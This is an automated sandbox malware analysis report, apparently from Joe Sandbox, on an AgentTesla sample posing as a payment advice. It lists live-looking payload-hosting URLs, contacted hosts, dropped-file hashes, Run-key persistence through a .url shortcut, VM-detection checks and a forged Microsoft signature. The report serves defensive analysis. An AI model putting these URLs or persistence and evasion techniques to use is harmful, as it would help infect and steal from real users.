                      External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion 13 | DCSync | Application Window Discovery 1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | Data Encrypted for Impact |
                      Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Process Injection 112 | Proc Filesystem | System Owner/User Discovery 1 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | Generate Fraudulent Advertising Revenue |
                      Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Masquerading | /etc/passwd and /etc/shadow | Remote System Discovery 1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | Data Destruction |
                      (Numbers following a technique name are the report's signature counts for that technique.)

                      Behavior Graph

                      Behavior Graph ID: 321416 | Sample: USD67,884.08_Payment_Advise_9083008849.exe | Startdate: 21/11/2020 | Architecture: WINDOWS | Score: 100
                      (The rendered graph and its icon legend are not recoverable from this export; the node data that survives is listed below.)
                      Top-level signatures: Multi AV Scanner detection for submitted file; Yara detected AgentTesla; Machine Learning detection for sample; Initial sample is a PE file and has a suspicious name
                      Processes started: Uclldrv.exe (two instances) and USD67,884.08_Payment_Advise_9083008849.exe; USD67,884.08_Payment_Advise_9083008849.exe starts a child USD67,884.08_Payment_Advise_9083008849.exe, and Uclldrv.exe starts a child Uclldrv.exe
                      DNS/IP info for Uclldrv.exe: 162.159.138.232 (ports 443, 49733, 49738; CLOUDFLARENETUS, United States); 192.168.2.1 (unknown)
                      DNS/IP info for USD67,884.08_Payment_Advise_9083008849.exe: airseaalliance.com 198.136.51.123 (ports 49708, 49734, 49739; DIMENOCUS, United States); discord.com 162.159.136.232 (ports 443, 49707; CLOUDFLARENETUS, United States)
                      Dropped file (by USD67,884.08_Payment_Advise_9083008849.exe): C:\Users\user\AppData\Local\...\Uclldrv.exe, PE32
                      Signatures on Uclldrv.exe: Multi AV Scanner detection for dropped file; Detected unpacking (changes PE section rights); Detected unpacking (overwrites its own PE header); Machine Learning detection for dropped file
                      Signatures on USD67,884.08_Payment_Advise_9083008849.exe: Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines); Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); Injects a PE file into a foreign processes


                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      Source | Detection | Scanner | Label
                      USD67,884.08_Payment_Advise_9083008849.exe | 41% | Virustotal |
                      USD67,884.08_Payment_Advise_9083008849.exe | 23% | ReversingLabs | Win32.Trojan.Wacatac
                      USD67,884.08_Payment_Advise_9083008849.exe | 100% | Joe Sandbox ML |

                      Dropped Files

                      Source | Detection | Scanner | Label
                      C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | 100% | Joe Sandbox ML |
                      C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe | 23% | ReversingLabs | Win32.Trojan.Wacatac

                      Unpacked PE Files

                      Source | Detection | Scanner | Label
                      13.2.Uclldrv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                      13.2.Uclldrv.exe.2ab0000.5.unpack | 100% | Avira | TR/Hijacker.Gen
                      16.2.Uclldrv.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1131223
                      13.2.Uclldrv.exe.45e0000.6.unpack | 100% | Avira | TR/Dropper.Gen

                      Domains

                      No Antivirus matches

                      URLs

                      Source | Detection | Scanner | Label
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/ | 0% | Avira URL Cloud | safe
                      http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp | 0% | Avira URL Cloud | safe
                      http://DynDns.comDynDNS | 0% | URL Reputation | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875 | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll0848 | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/7009$ | 0% | Avira URL Cloud | safe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
                      http://airseaalliance.com/wp-adm0 | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/t | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-sevent8 | 0% | Avira URL Cloud | safe
                      http://hHeaxI.com | 0% | Avira URL Cloud | safe
                      https://discord.com/ | 0% | URL Reputation | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-se | 0% | Avira URL Cloud | safe
                      http://airseaalliance.co | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twent | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/ | 0% | Avira URL Cloud | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374H | 0% | Avira URL Cloud | safe
                      https://discord.com/J | 0% | Avira URL Cloud | safe
                      https://api.ipify.orgGETMozilla/5.0 | 0% | URL Reputation | safe
                      http://airseaalliance.com/wp-admin/twenty-seventeen/ | 0% | Avira URL Cloud | safe

                      Domains and IPs

                      Contacted Domains

                          Name | IP | Active | Malicious | Antivirus Detection | Reputation
                          discord.com | 162.159.136.232 | true | false | | unknown
                          airseaalliance.com | 198.136.51.123 | true | false | | unknown

                          Contacted URLs

                          Name | Malicious | Antivirus Detection | Reputation
                          http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8 | false | Avira URL Cloud: safe | unknown

                          URLs from Memory and Binaries


                            Contacted IPs


                            Public

IP               Domain   Country        ASN    ASN Name         Malicious
162.159.136.232  unknown  United States  13335  CLOUDFLARENETUS  false
198.136.51.123   unknown  United States  33182  DIMENOCUS        false
162.159.138.232  unknown  United States  13335  CLOUDFLARENETUS  false

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:31.0.0 Red Diamond
                            Analysis ID:321416
                            Start date:21.11.2020
                            Start time:21:00:12
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 11m 43s
                            Hypervisor based Inspection enabled:false
                            Report type:light
                            Sample file name:USD67,884.08_Payment_Advise_9083008849.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:25
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@7/5@6/4
                            EGA Information:Failed
                            HDC Information:
                            • Successful, ratio: 8.9% (good quality ratio 8.4%)
                            • Quality average: 83.2%
                            • Quality standard deviation: 26.1%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 0
                            • Number of non-executed functions: 0
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe
                            • TCP Packets have been reduced to 100
                            • Excluded IPs from analysis (whitelisted): 168.61.161.212, 51.104.139.180, 13.88.21.125, 2.18.68.82, 20.54.26.129, 92.122.213.247, 92.122.213.194
                            • Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs.microsoft.com, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, e1723.g.akamaiedge.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, skypedataprdcolwus15.cloudapp.net
                            • Report creation exceeded maximum time and may have missing disassembly code information.
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

Time      Type             Description
21:00:56  API Interceptor  526x Sleep call for process: USD67,884.08_Payment_Advise_9083008849.exe modified
21:01:39  Autostart        Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Ucll C:\Users\user\AppData\Local\llcU.url
21:01:48  API Interceptor  250x Sleep call for process: Uclldrv.exe modified
21:01:48  Autostart        Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Ucll C:\Users\user\AppData\Local\llcU.url

                            Joe Sandbox View / Context

                            IPs


                                                                                                            Domains


                                                                                                            ASN

                                                                                                            CLOUDFLARENETUShttps://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://www.canva.com/design/DAEOEcu9Gnc/C6LvqPRfMOYoF6OWlu9bVg/view?utm_content=DAEOEcu9Gnc&utm_campaign=designshare&utm_medium=link&utm_source=sharebuttonGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            1.apkGet hashmaliciousBrowse
                                                                                                            • 172.67.163.11
                                                                                                            Fennec Pharma .docxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            activate_36059.EXEGet hashmaliciousBrowse
                                                                                                            • 172.67.75.29
                                                                                                            Fennec Pharma.xlsxGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://elharless.github.io/stamapdevmo/tak.html?bbre=oadfis48sdGet hashmaliciousBrowse
                                                                                                            • 172.67.185.66
                                                                                                            https://albanesebros.sendx.io/lp/shared-doc.htmlGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://xerox879784379923.azureedge.net??#ZGluYS5qb25nZWtyeWdAYWxhc2thYWlyLmNvbQGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://faxfax.zizera.com/remittanceadviceGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            https://flyboyfurnishings.com/firstam/RD-FITTGet hashmaliciousBrowse
                                                                                                            • 104.16.18.94
                                                                                                            http://ec.autohonda.itGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            Payment Invoice.exeGet hashmaliciousBrowse
                                                                                                            • 104.24.126.89
                                                                                                            https://mcmms.typeform.com/to/Vtnb9OBCGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            NQQWym075C.exeGet hashmaliciousBrowse
                                                                                                            • 23.227.38.64
                                                                                                            http://www.portal.office.com.s3-website.us-east-2.amazonaws.com#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            https://storage.googleapis.com/storesll0f4bb6d9b7f964569155d2bb42628/a83416219a20d87f4dabde9f057f93b5.html#p.steinberger@wafra.comGet hashmaliciousBrowse
                                                                                                            • 104.16.19.94
                                                                                                            ARjQJiNmBs.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            1piS4PBvBp.exeGet hashmaliciousBrowse
                                                                                                            • 104.18.88.101
                                                                                                            https://largemail.r1.rpost.net/files/7xU97qcFgCvB3Uv1wDC4qvS2ZriLfublohKWA5V3/ln/en-usGet hashmaliciousBrowse
                                                                                                            • 104.26.9.44

                                                                                                            JA3 Fingerprints

                                                                                                            No context

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Ucll08488374ODU8[1]
                                                                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):1114112
                                                                                                            Entropy (8bit):3.9946821874476472
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6yV:e
                                                                                                            MD5:A58901F05995FAA13C445E5A034E438A
                                                                                                            SHA1:122C5093FC63097614AE835B3A0C16501435E13B
                                                                                                            SHA-256:19FF839203BFDE839FDBAABBC15CA07578B8CF7447E5125D16674251733CC2D0
                                                                                                            SHA-512:954DFF11D4174739AD6B9EF52AF90A052EF93DEB489D6FA1F5699D33D7C2960A3AEDDFA5D810A1F05696F40A32B3025A57B8EBD320FD20F3AD983BA64C16EB72
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            IE Cache URL:http://airseaalliance.com/wp-admin/twenty-seventeen/70099875453/css/Ucll08488374ODU8
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\Ucll08488374ODU8[2]
                                                                                                            Process:C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1093675
                                                                                                            Entropy (8bit):3.9950764069850555
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6f:P
                                                                                                            MD5:10EED55FFF2D34F5E878B515A30BDD8E
                                                                                                            SHA1:8300F0DF2E40FF893A468014174A8C5BBF5DA69E
                                                                                                            SHA-256:DF94CD85FBF8691A25CEB452BA8E2BD2278CBFC673834B331D83F934EABD14EE
                                                                                                            SHA-512:1558BC0E6214C812508A411A0FCE1B84074D5A66E3594FF7CA98C2572CF1AC9E5364A70C6B2A4D4AABE916E14DF8C2B31461A6FF364F11260FA14388A7F7269A
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Ucll08488374ODU8[1]
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1114112
                                                                                                            Entropy (8bit):3.9946821874476472
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:24576:dUn7jAgqESZPGrFuwdUBeQ1LLyTaagnPT+SoUrco/QEBMSyt6yV:e
                                                                                                            MD5:A58901F05995FAA13C445E5A034E438A
                                                                                                            SHA1:122C5093FC63097614AE835B3A0C16501435E13B
                                                                                                            SHA-256:19FF839203BFDE839FDBAABBC15CA07578B8CF7447E5125D16674251733CC2D0
                                                                                                            SHA-512:954DFF11D4174739AD6B9EF52AF90A052EF93DEB489D6FA1F5699D33D7C2960A3AEDDFA5D810A1F05696F40A32B3025A57B8EBD320FD20F3AD983BA64C16EB72
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Uclldrv.exe
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):881008
                                                                                                            Entropy (8bit):6.904627526557324
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:sp7ku8t5ppfEQetKjNRfdjmrY2CprWkbR7X8uD79b7eUlgufunPQNZT:sp7Xs5otKjNR1J2YRPDR2eZfunPQDT
                                                                                                            MD5:947EDEB169369AC67C5448CC2F8104A3
                                                                                                            SHA1:5D2181F018AB4B8AFD6B193E4651233B44AD7D62
                                                                                                            SHA-256:3A89A79E825BF330E3EA46F6A5F548529B642DC61219A8DEEAEC070A0688A08E
                                                                                                            SHA-512:798B7004B2019FFBFF67A1F3636AD7DD3B93EF0A9338960D8A7E69EDA79AA7D9E097AA888B68F942E21F0A89E98DCA66D679F56D06B9AB7B81C4241B1F5840F8
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                            • Antivirus: ReversingLabs, Detection: 23%
                                                                                                            Reputation:low
                                                                                                            C:\Users\user\AppData\Local\llcU.url
                                                                                                            Process:C:\Users\user\Desktop\USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File Type:MS Windows 95 Internet shortcut text (URL=<file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Uclldrv.exe>), ASCII text, with CRLF line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):169
                                                                                                            Entropy (8bit):5.137619399669998
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:HRAbABGQYmHmEX+T+Bf5pEkD5oef5yaKdhXgrvQJ5ontCBuXV9k/qIH19Yxv:HRYFVmc0ckDlR9MhXgrvQJ5OtZF9k/qx
                                                                                                            MD5:C383417198123C1B803E7228FE264791
                                                                                                            SHA1:BBBE7674406F0E703C292059074DB0E18A7743E4
                                                                                                            SHA-256:3B79CA662589E4B480EF64A965C9E429C97E93195784D50B2AA7E92E7F35E7D7
                                                                                                            SHA-512:81E249F3E56695E00970FCAC2E43DE9175271A7A95D3C9BD48883ED7CB6FA9B99681BEF458A74888DE3AC590840E413B5A9DD7CC5C2C82398D147ABE2C57CE08
                                                                                                            Malicious:false
                                                                                                            Yara Hits:
                                                                                                            • Rule: Methodology_Shortcut_HotKey, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            • Rule: Methodology_Suspicious_Shortcut_IconNotFromExeOrDLLOrICO, Description: Detects possible shortcut usage for .URL persistence, Source: C:\Users\user\AppData\Local\llcU.url, Author: @itsreallynick (Nick Carr)
                                                                                                            Reputation:low
                                                                                                            Preview: [InternetShortcut]..URL=file:\\\C:\\Users\\user\\AppData\\Local\\Microsoft\\Windows\\Uclldrv.exe..IconIndex=1..IconFile=.url..Modified=20F06BA06D07BD014D..HotKey=1601..

                                                                                                            Static File Info

                                                                                                            General

                                                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                            Entropy (8bit):6.904627526557324
                                                                                                            TrID:
                                                                                                            • Win32 Executable (generic) a (10002005/4) 99.66%
                                                                                                            • Win32 Executable Delphi generic (14689/80) 0.15%
                                                                                                            • Windows Screen Saver (13104/52) 0.13%
                                                                                                            • Win16/32 Executable Delphi generic (2074/23) 0.02%
                                                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                            File name:USD67,884.08_Payment_Advise_9083008849.exe
                                                                                                            File size:881008
                                                                                                            MD5:947edeb169369ac67c5448cc2f8104a3
                                                                                                            SHA1:5d2181f018ab4b8afd6b193e4651233b44ad7d62
                                                                                                            SHA256:3a89a79e825bf330e3ea46f6a5f548529b642dc61219a8deeaec070a0688a08e
                                                                                                            SHA512:798b7004b2019ffbff67a1f3636ad7dd3b93ef0a9338960d8a7e69eda79aa7d9e097aa888b68f942e21f0a89e98dca66d679f56d06b9ab7b81c4241b1f5840f8
                                                                                                            SSDEEP:12288:sp7ku8t5ppfEQetKjNRfdjmrY2CprWkbR7X8uD79b7eUlgufunPQNZT:sp7Xs5otKjNR1J2YRPDR2eZfunPQDT
                                                                                                            File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                                                            File Icon

                                                                                                            Icon Hash:64ccd4f0f0f0f8d4

                                                                                                            Static PE Info

General

Entrypoint: 0x48116c
Entrypoint Section: CODE
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp: 0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 89589872fc7726fd761d44d4f95ea8b1

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
• 12/7/2009 2:40:29 PM, 3/7/2011 2:40:29 PM
Subject Chain:
• CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version: 3
Thumbprint MD5: E3FEDB37F4874E84CDB82A789FFDCD67
Thumbprint SHA-1: 9617094A1CFB59AE7C1F7DFDB6739E4E7C40508F
Thumbprint SHA-256: 277D42066A68326BA10B1874D393327404287C14A9C9DB1C09D50698952A17DD
Serial: 6101CF3E00000000000F

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
push ebx
mov eax, 00480EDCh
call 00007F4BC8B4D984h
mov ebx, dword ptr [00483E58h]
mov eax, dword ptr [ebx]
call 00007F4BC8BA7A5Fh
mov eax, dword ptr [ebx]
mov edx, 004811E8h
call 00007F4BC8BA763Bh
mov ecx, dword ptr [00483EFCh]
mov eax, dword ptr [ebx]
mov edx, dword ptr [00480158h]
call 00007F4BC8BA7A58h
mov ecx, dword ptr [00483E74h]
mov eax, dword ptr [ebx]
mov edx, dword ptr [004686BCh]
call 00007F4BC8BA7A45h
mov eax, dword ptr [00483EFCh]
mov eax, dword ptr [eax]
xor edx, edx
call 00007F4BC8BA0F13h
mov eax, dword ptr [ebx]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [ebx]
call 00007F4BC8BA7AAAh
pop ebx
call 00007F4BC8B4B710h
add byte ptr [eax], al
add bh, bh

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x87000          0x24dc        .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x96000          0x46c00       .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0xd5a00          0x1770        .rsrc
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x8c000          0x9740        .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x8b000          0x18          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy        Characteristics
CODE    0x1000           0x801f4       0x80200   False     0.515535442073   data       6.50883615521  IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA    0x82000          0x2004        0x2200    False     0.376723345588   data       4.44302763906  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS     0x85000          0x1115        0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata  0x87000          0x24dc        0x2600    False     0.357113486842   data       4.9259049312   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls    0x8a000          0x40          0x0       False     0                empty      0.0            IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata  0x8b000          0x18          0x200     False     0.05078125       data       0.20448815744  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc  0x8c000          0x9740        0x9800    False     0.545718544408   data       6.629801538    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc   0x96000          0x46c00       0x46c00   False     0.539121162765   data       7.04108058953  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name             RVA      Size     Type                                                     Language  Country
RT_CURSOR        0x96c9c  0x134    data
RT_CURSOR        0x96dd0  0x134    data
RT_CURSOR        0x96f04  0x134    data
RT_CURSOR        0x97038  0x134    data
RT_CURSOR        0x9716c  0x134    data
RT_CURSOR        0x972a0  0x134    data
RT_CURSOR        0x973d4  0x134    data
RT_BITMAP        0x97508  0x1d0    data
RT_BITMAP        0x976d8  0x1e4    data
RT_BITMAP        0x978bc  0x1d0    data
RT_BITMAP        0x97a8c  0x1d0    data
RT_BITMAP        0x97c5c  0x1d0    data
RT_BITMAP        0x97e2c  0x1d0    data
RT_BITMAP        0x97ffc  0x1d0    data
RT_BITMAP        0x981cc  0x1d0    data
RT_BITMAP        0x9839c  0x1d0    data
RT_BITMAP        0x9856c  0x1d0    data
RT_BITMAP        0x9873c  0xe8     GLS_BINARY_LSB_FIRST                                     English   United States
RT_ICON          0x98824  0x10a8   data                                                     English   United States
RT_ICON          0x998cc  0x25a8   data                                                     English   United States
RT_ICON          0x9be74  0x4228   dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 49407, next used block 4294909696  English  United States
RT_ICON          0xa009c  0x5488   data                                                     English   United States
RT_ICON          0xa5524  0xa2a8   data                                                     English   United States
RT_DIALOG        0xaf7cc  0x52     data
RT_STRING        0xaf820  0xac     data
RT_STRING        0xaf8cc  0x1cc    data
RT_STRING        0xafa98  0x188    data
RT_STRING        0xafc20  0x1b0    data
RT_STRING        0xafdd0  0x618    data
RT_STRING        0xb03e8  0x244    data
RT_STRING        0xb062c  0xe8     data
RT_STRING        0xb0714  0x12c    data
RT_STRING        0xb0840  0x2ec    data
RT_STRING        0xb0b2c  0x410    data
RT_STRING        0xb0f3c  0x380    data
RT_STRING        0xb12bc  0x418    data
RT_STRING        0xb16d4  0x1b0    data
RT_STRING        0xb1884  0xec     data
RT_STRING        0xb1970  0x1e4    data
RT_STRING        0xb1b54  0x3e8    data
RT_STRING        0xb1f3c  0x358    data
RT_STRING        0xb2294  0x2b4    data
RT_RCDATA        0xb2548  0x10     data
RT_RCDATA        0xb2558  0x380    data
RT_RCDATA        0xb28d8  0x801    Delphi compiled form 'TFormFilter'
RT_RCDATA        0xb30dc  0x6c3    Delphi compiled form 'TMainPage'
RT_RCDATA        0xb37a0  0x28fb0  GIF image data, version 89a, 777 x 321                   English   United States
RT_GROUP_CURSOR  0xdc750  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc764  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc778  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc78c  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc7a0  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc7b4  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_CURSOR  0xdc7c8  0x14     Lotus unknown worksheet or configuration, revision 0x1
RT_GROUP_ICON    0xdc7dc  0x4c     data                                                     English   United States
RT_MANIFEST      0xdc828  0x336    XML 1.0 document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators  English  United States

Imports

DLL           Import
